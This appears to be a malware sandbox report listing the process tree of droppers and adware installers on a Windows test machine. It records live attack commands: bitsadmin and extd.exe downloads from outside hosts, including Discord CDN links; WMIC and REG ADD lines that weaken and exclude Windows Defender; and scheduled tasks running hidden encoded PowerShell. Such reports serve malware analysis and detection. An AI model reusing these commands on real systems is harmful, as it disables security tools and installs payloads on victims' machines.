C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6308 /prefetch:19⤵PID:6440
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:19⤵PID:5872
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:19⤵PID:8336
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:19⤵PID:8408
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad8⤵PID:9348
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:9372
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514838⤵PID:12772
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:12792
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515138⤵PID:7136
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:1512
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872158⤵PID:4848
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:2592
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631198⤵PID:7640
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:2256
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942318⤵PID:8040
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:7936
C:\Users\Admin\AppData\Local\Temp\d4-f0774-8ea-dd588-36bf64dbf255f\Lukykutufu.exe"C:\Users\Admin\AppData\Local\Temp\d4-f0774-8ea-dd588-36bf64dbf255f\Lukykutufu.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
PID:4276
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ypp5nifk.gma\GcleanerEU.exe /eufive & exit8⤵PID:12756
C:\Users\Admin\AppData\Local\Temp\ypp5nifk.gma\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ypp5nifk.gma\GcleanerEU.exe /eufive9⤵PID:16204
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16204 -s 26810⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4540
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s3zsbqz4.2im\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:16028
C:\Users\Admin\AppData\Local\Temp\s3zsbqz4.2im\installer.exeC:\Users\Admin\AppData\Local\Temp\s3zsbqz4.2im\installer.exe /qn CAMPAIGN="654"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:16248
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\s3zsbqz4.2im\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\s3zsbqz4.2im\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632862242 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:5244
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2dew2x1f.ru3\any.exe & exit8⤵PID:16132
C:\Users\Admin\AppData\Local\Temp\2dew2x1f.ru3\any.exeC:\Users\Admin\AppData\Local\Temp\2dew2x1f.ru3\any.exe9⤵PID:16236
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rmndzvzo.0mb\gcleaner.exe /mixfive & exit8⤵PID:16304
C:\Users\Admin\AppData\Local\Temp\rmndzvzo.0mb\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\rmndzvzo.0mb\gcleaner.exe /mixfive9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6128
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 26410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2276
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oc3klthe.nuh\autosubplayer.exe /S & exit8⤵PID:5908
C:\Users\Admin\AppData\Local\Temp\oc3klthe.nuh\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\oc3klthe.nuh\autosubplayer.exe /S9⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:2868
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:6932
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:4004
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2824
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:2992
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:7500
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:7700
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:7904
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
PID:8232
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
PID:8420
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pGbecjOO199LHnZy -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵PID:9752
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p8Xo1pCjtMppzo7M -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
- Drops file in Program Files directory
PID:9804
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:9860
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:10056
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:10272
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:10488
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:10680
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OsCELDuBOVuk\OsCELDuBOVuk.dll" OsCELDuBOVuk10⤵
- Loads dropped DLL
PID:10868
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OsCELDuBOVuk\OsCELDuBOVuk.dll" OsCELDuBOVuk11⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
PID:10884
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:10948
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵
- Drops file in Program Files directory
PID:11284
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵
- Drops file in Program Files directory
PID:11492
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:11684
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:11888
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT10⤵
- Loads dropped DLL
PID:12172
C:\Users\Admin\Documents\d6VXIVqi2MqlNOaKIT8CawaY.exe"C:\Users\Admin\Documents\d6VXIVqi2MqlNOaKIT8CawaY.exe"2⤵
- Executes dropped EXE
PID:4412
C:\Users\Admin\AppData\Local\Temp\7zSFD18.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
PID:5680
C:\Users\Admin\AppData\Local\Temp\7zS2E1B.tmp\Install.exe.\Install.exe /S /site_id "394347"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
PID:3912
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &5⤵PID:2200
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"6⤵PID:4424
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:6036
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True8⤵PID:1504
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:6860
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"6⤵PID:6436
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:5648
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True8⤵PID:5724
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:4032
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"6⤵PID:5520
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:5512
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True8⤵PID:5740
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:4604
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"6⤵PID:1536
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:5212
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True8⤵PID:3092
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:5528
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵PID:4156
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵PID:2536
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵PID:6596
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵PID:592
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵PID:4448
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵PID:2908
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵PID:6244
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵PID:6612
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCnxIKkMy" /SC once /ST 11:57:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
PID:6356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 13:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\GqKTDMf.exe\" uG /site_id 394347 /S" /V1 /F5⤵
- Creates scheduled task(s)
PID:3136
-
-
-
-
-
  C:\Users\Admin\Documents\zb9d5srca1S85UfvPFnTAZJd.exe (PID 3012)
      "C:\Users\Admin\Documents\zb9d5srca1S85UfvPFnTAZJd.exe"
      - Executes dropped EXE
    C:\Windows\SysWOW64\WerFault.exe (PID 7052)
        C:\Windows\SysWOW64\WerFault.exe -u -p 3012 -s 280
        - Program crash
        - Checks processor information in registry
        - Enumerates system info in registry
  C:\Users\Admin\Documents\HDnlha8KQxoi8bwvnS6xlPp4.exe (PID 3560)
      "C:\Users\Admin\Documents\HDnlha8KQxoi8bwvnS6xlPp4.exe"
      - Executes dropped EXE
    C:\Windows\system32\cmd.exe (PID 4060)
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\1370.bat C:\Users\Admin\Documents\HDnlha8KQxoi8bwvnS6xlPp4.exe"
      C:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\extd.exe (PID 5796)
          C:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/890550701829259356/exe.exe" "exe.exe" "" "" "" "" "" ""
      C:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\extd.exe (PID 1436)
          C:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/892465432404054046/1.exe" "1.exe" "" "" "" "" "" ""
          - Executes dropped EXE
      C:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\extd.exe (PID 5852)
          C:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\extd.exe "" "" "" "" "" "" "" "" ""
      C:\Users\Admin\AppData\Local\Temp\3185\1.exe (PID 5140)
          1.exe
          - Executes dropped EXE
  C:\Users\Admin\Documents\2TUQ8CP6z7s4Vba1fkZDJJUU.exe (PID 5244)
      "C:\Users\Admin\Documents\2TUQ8CP6z7s4Vba1fkZDJJUU.exe"
    C:\Windows\SysWOW64\WerFault.exe (PID 4776)
        C:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 1880
        - Program crash
        - Checks processor information in registry
        - Enumerates system info in registry
  C:\Users\Admin\Documents\H6KBNe4YRhkCjXl_yzSBZb2I.exe (PID 5092)
      "C:\Users\Admin\Documents\H6KBNe4YRhkCjXl_yzSBZb2I.exe"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
  C:\Users\Admin\Documents\rPRLfhZmwXu3oXGQaqju2XrO.exe (PID 3200)
      "C:\Users\Admin\Documents\rPRLfhZmwXu3oXGQaqju2XrO.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Checks processor information in registry
    C:\Windows\SysWOW64\cmd.exe (PID 3408)
